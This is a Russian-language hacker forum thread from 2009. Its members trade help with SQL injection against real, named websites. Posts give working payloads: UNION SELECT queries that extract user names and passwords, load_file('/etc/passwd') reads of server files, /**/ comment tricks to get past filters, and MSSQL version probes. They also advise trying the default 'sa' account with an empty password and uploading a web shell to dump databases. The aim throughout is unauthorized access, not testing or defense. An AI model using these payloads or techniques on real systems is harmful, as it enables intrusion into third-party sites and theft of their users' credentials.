RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj)
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-04 17:52:15.880000
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
farex попробуй следующие символы:
табуляция (%09)
возврат каретки (%0D)
перевод строки (%0A)
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-04 17:57:49.826666
|
|
|
farex
Сообщений: 261
Оценки: 0
Присоединился: 2009-02-15 20:48:17.506666
|
конечо спасибо….
но не помагает…
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-04 18:10:24.380000
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
farex да дело там, по ходу, не в пробеле.
Кажется, передаваемый параметр проверяется на соответствие числу, а если не соответствует, то происходит редирект.
А может, параметр заключен в кавычки и на сервере кавычки зкранируются. А в случае ненахождения страницы происходит редирект.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-05 00:24:47.743333
|
|
|
massovka
Сообщений: 13
Оценки: 0
Присоединился: 2009-04-04 20:13:43.740000
|
РЕБЯТА ПОМОГИТЕ ЧТО СДЕЛАТЬ С ЭТОЙ ШТУКОЙ
SQL-инъекцыю хочу сделать все почитал не могу понять
catalog/index.php?a=search&by=date_&order=1'&m[type_]=0&m[name1]=&m[name2]=&m[color_eyes]=&m[color_hair]=&m[l_hair]=&m[h0]=&m[h1]=&m[w0]=&m[w1]=&m[hips0]=&m[hips1]=&m[waist0]=&m[waist1]=&m[chest0]=&m[chest1]=&m[old0]=&m[old1]=&per_page=30
НЕТ ТАМ ID И НЕ ЗНАЮ ЧТО ДЕЛАТЬ ДАЙТЕ ХОТЬ НАМЕК
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-05 01:09:53.123333
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
Чем тебе помочь? Могу только дать ссылку на лучший мануал по sql-inj. Тут.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-05 01:58:07.250000
|
|
|
Leegger
Сообщений: 2
Оценки: 0
Присоединился: 2009-04-05 01:13:57.006666
|
Здравствуйте господа форумчане.Имеется инъекция,но при запросе на вывод информации из таблицы пишет:Table 'site_com.X7AB_USERS' doesn't exist.Таблицы и поля выводил через Information_Schema.Пробывал кодировать в hex,мекс короче во все что угодно-результат ноль.Подскажите в чем дело?[sm=sm128.gif]И еще прочитал интересную статью http://raz0r.name/obzory/sql-inekcii-i-procedure-analyse/ ,но как использовать на живом примере так и не догнал.Спецы,внесите ясность.[sm=peace.gif]
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-05 02:16:23.693333
|
|
|
S00pY
Сообщений: 785
Оценки: 0
Присоединился: 2007-04-14 20:44:05.376666
|
2Leegger
Таблица в другой бд походу…
CONCAT_WS(0x3a,TABLE_NAME,TABLE_SCHEMA) когда выводишь из information_schema.tables,TABLE_SCHEMA -имя бд.
select from имя бд.нужная табла
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-05 03:23:19.430000
|
|
|
Leegger
Сообщений: 2
Оценки: 0
Присоединился: 2009-04-05 01:13:57.006666
|
Spasibo SOOpY, no poyavilsya eshe vopros:
viyasnil imya bd.-"TEST" delayu zapros:
site.com/prod.php?ID=-1+union+select+1,2,concat(UNAME,0x3a,PASS),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+TEST.X7AB_USERS–
opyat oshibka:
SELECT command denied to user 'site07'@'localhost' for table 'X7AB_USERS'
Kak oboity eto?[sm=bc.gif]
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-05 03:42:28.033333
|
|
|
S00pY
Сообщений: 785
Оценки: 0
Присоединился: 2007-04-14 20:44:05.376666
|
Нет прав на вывод для этого юзера
поищи другие таблы если нет ничего интересного тогда
нужно искать уязвимые скрипты работающие с бд под другим юзером… посмотри возможно у юзера file_priv=Y тогда можно будет прочесть файлы .. например файл содержаший данные для работы с бд
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-05 10:44:32.916666
|
|
|
massovka
Сообщений: 13
Оценки: 0
Присоединился: 2009-04-04 20:13:43.740000
|
Форумчани помогите с чего мне начать? вот линк ноч не спал читал мануалы
catalog/index.php?a=search&by=date_&order=1'&m[type_]=0&m[name1]=&m[name2]=&m[color_eyes]=&m[color_hair]=&m[l_hair]=&m[h0]=&m[h1]=&m[w0]=&m[w1]=&m[hips0]=&m[hips1]=&m[waist0]=&m[waist1]=&m[chest0]=&m[chest1]=&m[old0]=&m[old1]=&per_page=30
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-05 12:23:21.396666
|
|
|
Kinger
Сообщений: 2
Оценки: 0
Присоединился: 2009-04-05 12:12:35.726666
|
Народ плизззззззззз взломайте пароль рара по этой ссылке http://letitbit.net/download/b2fc8048156/Gold-.zip.html и если получится отправьте по этому майлу pwpodarok@yandex.ru плиззззззззззззззззззззззззззззззззззззззззз =( ???
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-05 12:27:55.536666
|
|
|
Kinger
Сообщений: 2
Оценки: 0
Присоединился: 2009-04-05 12:12:35.726666
|
http://s40.radikal.ru/i090/0902/86/3dd065a1b7a7.png
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-05 13:19:44.300000
|
|
|
hasbah
Сообщений: 8
Оценки: 0
Присоединился: 2009-04-03 17:38:13.920000
|
а есть ли такая возможность как выгрузить базу себе ?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-05 16:50:13.956666
|
|
|
massovka
Сообщений: 13
Оценки: 0
Присоединился: 2009-04-04 20:13:43.740000
|
Привет всем ребята помогите
Нашел сайтик что мне нужно! сделал sql-inj
Узнал
Версия версия СУБД (базы данных) - 5.0.45
пролистал все колонки но нигде не нашел упоминание о admin user
Что сделал не так кто поможет?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-05 17:55:49.933333
|
|
|
hasbah
Сообщений: 8
Оценки: 0
Присоединился: 2009-04-03 17:38:13.920000
|
кинь ссылку (=
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-05 18:22:33.443333
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
quote:
а есть ли такая возможность как выгрузить базу себе ?
Залей шелл и выгружай )
quote:
Привет всем ребята помогите
Нашел сайтик что мне нужно! сделал sql-inj
Узнал
Версия версия СУБД (базы данных) - 5.0.45
пролистал все колонки но нигде не нашел упоминание о admin user
Что сделал не так кто поможет?
1. Возможно там бейсиковая админка. Пробуй load_file()
2. Возможно там вообще нет админки.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-05 18:24:47.643333
|
|
|
massovka
Сообщений: 13
Оценки: 0
Присоединился: 2009-04-04 20:13:43.740000
|
Админка есть 100%
просто искал в полях базы ничего про не нашел
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-05 18:26:08.356666
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
Ну рассматривай первый вариант.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-05 18:27:41.280000
|
|
|
massovka
Сообщений: 13
Оценки: 0
Присоединился: 2009-04-04 20:13:43.740000
|
может я тебе линк дам посмотришь?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-05 18:28:34.190000
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
Кидай в пм.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-05 21:49:38.746666
|
|
|
massovka
Сообщений: 13
Оценки: 0
Присоединился: 2009-04-04 20:13:43.740000
|
quote:
ORIGINAL: massovka
Привет всем ребята помогите
Нашел сайтик что мне нужно! сделал sql-inj
Узнал
Версия версия СУБД (базы данных) - 5.0.45
пролистал все колонки но нигде не нашел упоминание о admin user
Что сделал не так кто поможет?
Может посмотреть каждое поле там? вдруг админ поменял названия???
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-06 11:38:41.850000
|
|
|
massovka
Сообщений: 13
Оценки: 0
Присоединился: 2009-04-04 20:13:43.740000
|
Ну что кто скажет по поводу этого???
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-06 11:52:46
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
Найди админку. Посмотри какая там авторизация, базовая или просто через форму.
Через load_file() почитай все скрипты. Особенно скрипт авторизации. Посмотри в нем, какой запрос отправляется базе, к какой таблице. Как вариант, пароль админа может быть прошит в скрипте.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-06 12:06:44.830000
|
|
|
massovka
Сообщений: 13
Оценки: 0
Присоединился: 2009-04-04 20:13:43.740000
|
,load_file(0x2f6574632f706173737764)
load_file(/etc/passwd/)
Ставил пусто ничего не показует! :(
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-06 14:21:26.180000
|
|
|
farex
Сообщений: 261
Оценки: 0
Присоединился: 2009-02-15 20:48:17.506666
|
quote:
ORIGINAL: massovka
,load_file(0x2f6574632f706173737764)
load_file(/etc/passwd/)
Ставил пусто ничего не показует! :(
ну не так load_file(/etc/passwd/)
a так load_file('/etc/passwd/')
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-07 02:02:12.033333
|
|
|
alex7474
Сообщений: 54
Оценки: 0
Присоединился: 2008-09-11 11:29:55.193333
|
доброго времени суток! помогите ребят чем можете (звучит как дайте на хлеб (((( )
http://la2.is74.ru/c6_info/?part=items&id=
mssql
попыталмся дернуть :
http://la2.is74.ru/c6_info/?part=items&id=1 or 1=SELECT 1 –
http://la2.is74.ru/c6_info/?part=items&id=1%20or%201=@@version–
'Microsoft SQL Server 2005 - 9.00.3042.00 (X64) Feb 10 2007 00:59:02 Copyright (c) 1988-2005 Microsoft Corporation Enterprise Evaluation Edition (64-bit) on Windows NT 6.0 (Build 6001: Service Pack 1)
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-07 11:48:31.520000
|
|
|
farex
Сообщений: 261
Оценки: 0
Присоединился: 2009-02-15 20:48:17.506666
|
почитай << ЗдесЬ >>
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-07 12:22:04.766666
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
alex7474
Там все делается от имени пользователя sa
В mssql по умолчанию админ имеет такой логин и пустой пароль. Попробуй так приконнектится к базе на прямую.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-07 13:50:37.580000
|
|
|
farex
Сообщений: 261
Оценки: 0
Присоединился: 2009-02-15 20:48:17.506666
|
http://www.eizs.ru/index.php?area=1'+order+by+1+--+
проблемка с выводом…
horiz не знаеш в чем может быть дело
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-07 14:01:40.550000
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
farex
Надо так.
http://www.eizs.ru/index.php?area=1'/**/order/**/by/**/4/* там 4 столбца
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-07 14:17:40.896666
|
|
|
farex
Сообщений: 261
Оценки: 0
Присоединился: 2009-02-15 20:48:17.506666
|
horiz
Там значит + фильтруется…
Спс, как то не подумал…..
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-07 14:20:03.040000
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
farex
нет + там не фильтруется, он почему-то при попадании на сервер не превращается в пробел, а так и подставляется в запрос.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-07 14:40:59.526666
|
|
|
farex
Сообщений: 261
Оценки: 0
Присоединился: 2009-02-15 20:48:17.506666
|
там кстати с дальнейшим выводом тоже траблы и как слепая тоже не крутится..
Ну ладно, буду юзать… Может чего и выведу.. :)
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-07 15:55:16.966666
|
|
|
alex7474
Сообщений: 54
Оценки: 0
Присоединился: 2008-09-11 11:29:55.193333
|
вот токо проблема то - порт 1433 закрыт(для SA), а запрос типа 1'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+IN FORMATION_SCHEMA.TABLES)–
невоспринемает, мол TOP FROM для него неизвестные
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-07 16:10:30.553333
|
|
|
regG!De.d0c
Сообщений: 18
Оценки: 0
Присоединился: 2009-03-16 10:40:58.300000
|
попробуй select маленькими буквами ;)
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-07 16:28:44.640000
|
|
|
alex7474
Сообщений: 54
Оценки: 0
Присоединился: 2008-09-11 11:29:55.193333
|
SELECT проходит …
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-07 16:36:29.110000
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
Куда проходит? В чем проблема-то?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-07 16:36:29.423333
|
|
|
regG!De.d0c
Сообщений: 18
Оценки: 0
Присоединился: 2009-03-16 10:40:58.300000
|
Там, похоже, запятые фильтруются кроме того, учти…
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-07 16:47:03.756666
|
|
|
alex7474
Сообщений: 54
Оценки: 0
Присоединился: 2008-09-11 11:29:55.193333
|
reg покажи мне хоть одну запяту
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-04-07 16:50:52.033333
|
|
|
regG!De.d0c
Сообщений: 18
Оценки: 0
Присоединился: 2009-03-16 10:40:58.300000
|
попробуй вставить в запрос, например, left(table_name,1)=char(97)
посмотри во что превратиться запрос…
|
|
|
|
|
|
